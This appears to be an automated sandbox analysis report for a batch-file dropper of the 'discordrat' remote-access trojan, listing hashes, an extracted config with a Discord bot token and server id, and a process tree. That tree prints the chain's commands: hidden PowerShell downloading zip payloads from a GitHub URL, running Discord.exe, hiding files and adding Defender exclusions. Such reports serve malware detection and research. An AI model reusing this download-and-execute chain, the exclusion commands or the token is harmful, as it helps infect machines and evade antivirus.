Analysis

  • max time kernel
    7s
  • max time network
    10s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-10-2024 23:09

General

  • Target

    asd.bat

  • Size

    1KB

  • MD5

    0dababeef5a7a86809d847382772d821

  • SHA1

    612be301ee1bc7a422f79b2d17822ee2244efc4c

  • SHA256

    56af74c6f17f1e987ace45d8ec180ed38d221f2fdfe9d601bdec2d703689bdb4

  • SHA512

    1ec9342d34914503dc475fd5fb300cbbb2ace1e9b6e8cc1b9221dd3468eb64a1e0d7f3d0c6f8427207239c61c4b8fb87da89f88f6920b95ef928dd1214d17d6a

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTI5Njg5NDEwMjY0NTkwMzQwMA.GbbBFh.ZTr18FyMmzROaUjB4OeMEYamtttj4Hm8E7t2kA

  • server_id

    1293738586679672945

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Powershell Invoke Web Request.

  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\asd.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -window hidden -command ""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2028
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:4244
      • C:\Windows\system32\attrib.exe
        attrib +h "Anon" /s /d
        2⤵
        • Views/modifies file attributes
        PID:2036
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3460
      • C:\Windows\system32\tar.exe
        tar -xf 1.zip
        2⤵
          PID:2324
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\1.bat"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2752
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -window hidden -command ""
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:60
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:756
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3748
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\2.bat"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2816
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -window hidden -command ""
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1588
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Powershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/Discord.zip' -OutFile Discord.zip"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5072
            • C:\Windows\system32\tar.exe
              tar -xf Discord.zip
              4⤵
                PID:3092
              • C:\Users\Admin\AppData\Local\Anon\Discord.exe
                Discord.exe
                4⤵
                • Executes dropped EXE
                PID:828
              • C:\Windows\system32\attrib.exe
                attrib +h "C:\Users\Admin\AppData\Local\Anon\Discord.exe" /s /d
                4⤵
                • Views/modifies file attributes
                PID:1564

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Anon\1.bat

          Filesize

          268B

          MD5

          cdb8a5fcca6c6b2ac156c95610dd62b0

          SHA1

          fc9143fbdfc511193d627682d03da517ef03eac0

          SHA256

          c99e311f09fdc9a371c67971575f59962dc1d5bb02afdcff72d74d0b3ede34df

          SHA512

          b1eded36047153fe99fb8fe4e29667d6aefe3431d1de1669f364fa185584bf6fbfff5cd7f10bc7a56f9f055e350276ac4219e737836873b5c542927c317814f9

        • C:\Users\Admin\AppData\Local\Anon\1.zip

          Filesize

          661B

          MD5

          15af212f6b388a57510af30146ea51f8

          SHA1

          9833f92d882d8e69bd453bdb2f3feda15d961c0f

          SHA256

          62b1f7ab4fcf8a68f31afd384c8d1f1d46124991e1d5d19ea04eece62a63a897

          SHA512

          90614fcb1c43df3d46c5d76bfcb777f9a276507e9a6a6a59d5e248e9de04b681656b5417e84758a78848580ca252c1ab07509102c924d2c67a42f419f294ea05

        • C:\Users\Admin\AppData\Local\Anon\2.bat

          Filesize

          327B

          MD5

          9cbac74f137243a22af973eacd90de31

          SHA1

          3260ea401134322fe037a35b685c66a0793c3658

          SHA256

          567296eeadb0e5463e11abc4f05b6617d72944a382d0202cb0cc6954d2a17465

          SHA512

          e729d873c6fd9af96092831ad7efc1fb5deca094fd48a4cc3874ce0c7a6814f97bb7c737393d1755b495dfd91791206d7ba6f8c8d51150ccf698f49627a23e60

        • C:\Users\Admin\AppData\Local\Anon\Discord.exe

          Filesize

          51KB

          MD5

          85bced49019c64cbc712ff6e6f14a128

          SHA1

          969c4ca9c1176e06cda1139ef2f1ab3187c0af6c

          SHA256

          d98e1114aaa82b82b670977f156c649b6a242556024e9071b2606ee2e921c5de

          SHA512

          1cceaa34890c95038adbebf83b59b5e8ea04464f5559c9ae2d10484aaa39fe40a25c002bb2b01947593d70aef7a6bc3be03e9ca64eb9ccba860eaddc54149834

        • C:\Users\Admin\AppData\Local\Anon\Discord.zip

          Filesize

          45KB

          MD5

          6daf7b41d40c684fc329ddeaa10e8a70

          SHA1

          7869289c6b91ce199aa69ade7c9bcc973cb60b2c

          SHA256

          df78cfcaa08580827f47fcffc59c133e77ccdbe893817cfa28cb519ec5826927

          SHA512

          b9fcabe209f08c9de6b1f01cc33d28909d9e4912d061858236771e6c58822b2021cfeb0ddb94900111a34e19b7adff3d54039857b2662c9e8d0b041377282915

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          3ca1082427d7b2cd417d7c0b7fd95e4e

          SHA1

          b0482ff5b58ffff4f5242d77330b064190f269d3

          SHA256

          31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

          SHA512

          bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          1dffbab5ecc6d06e8b259ad505a0dc2a

          SHA1

          0938ec61e4af55d7ee9d12708fdc55c72ccb090c

          SHA256

          a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

          SHA512

          93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          b16dc67d8633fb86f9d9dc491097150e

          SHA1

          0ea564df2675c5e2a82449530dd070ad855dfcd6

          SHA256

          378c51f20fe67c7ef650d594dca84dd39f8eaeb28876fe783bb3f98394bb494b

          SHA512

          c41852fc8c6728dce8aaa7d9104b39c9e9a6bdcc0354ff5e0d0bff3c055b9aebbb080111c90f6b70db28a1e81b8ca1e3cfec4f8a4f6e59a75188215c21788cdd

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          96ff1ee586a153b4e7ce8661cabc0442

          SHA1

          140d4ff1840cb40601489f3826954386af612136

          SHA256

          0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

          SHA512

          3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          96e3b86880fedd5afc001d108732a3e5

          SHA1

          8fc17b39d744a9590a6d5897012da5e6757439a3

          SHA256

          c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294

          SHA512

          909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          02c05ea0305ff81a1dcdcf0144d163c4

          SHA1

          4d0dfaa89ace93c8981325a37a2529536779d329

          SHA256

          fb9ab3d6f37e071366cb9016d0be7987b8cfd64f13b222159fe7218977d27016

          SHA512

          9b28f94b689cb3011720a1f026ef458dcee633336d1727743a5d3c52464d4bf6c9f0c2f21b3e30c6fc37de39b772fc1dae4f0f9263d6f1f72426f4a70de1d4df

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l0w530pd.1qt.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/828-101-0x00000285DBB50000-0x00000285DBD12000-memory.dmp

          Filesize

          1.8MB

        • memory/828-100-0x00000285C18F0000-0x00000285C1908000-memory.dmp

          Filesize

          96KB

        • memory/828-99-0x00000285C1520000-0x00000285C1532000-memory.dmp

          Filesize

          72KB

        • memory/2028-11-0x00007FFA03FC0000-0x00007FFA04A81000-memory.dmp

          Filesize

          10.8MB

        • memory/2028-0-0x00007FFA03FC3000-0x00007FFA03FC5000-memory.dmp

          Filesize

          8KB

        • memory/2028-1-0x0000017717D30000-0x0000017717D52000-memory.dmp

          Filesize

          136KB

        • memory/2028-12-0x00007FFA03FC0000-0x00007FFA04A81000-memory.dmp

          Filesize

          10.8MB

        • memory/2028-15-0x00007FFA03FC0000-0x00007FFA04A81000-memory.dmp

          Filesize

          10.8MB

        • memory/3460-32-0x00007FFA03BB0000-0x00007FFA04671000-memory.dmp

          Filesize

          10.8MB

        • memory/3460-17-0x00007FFA03BB0000-0x00007FFA04671000-memory.dmp

          Filesize

          10.8MB

        • memory/3460-28-0x00007FFA03BB0000-0x00007FFA04671000-memory.dmp

          Filesize

          10.8MB

        • memory/3460-29-0x00007FFA03BB0000-0x00007FFA04671000-memory.dmp

          Filesize

          10.8MB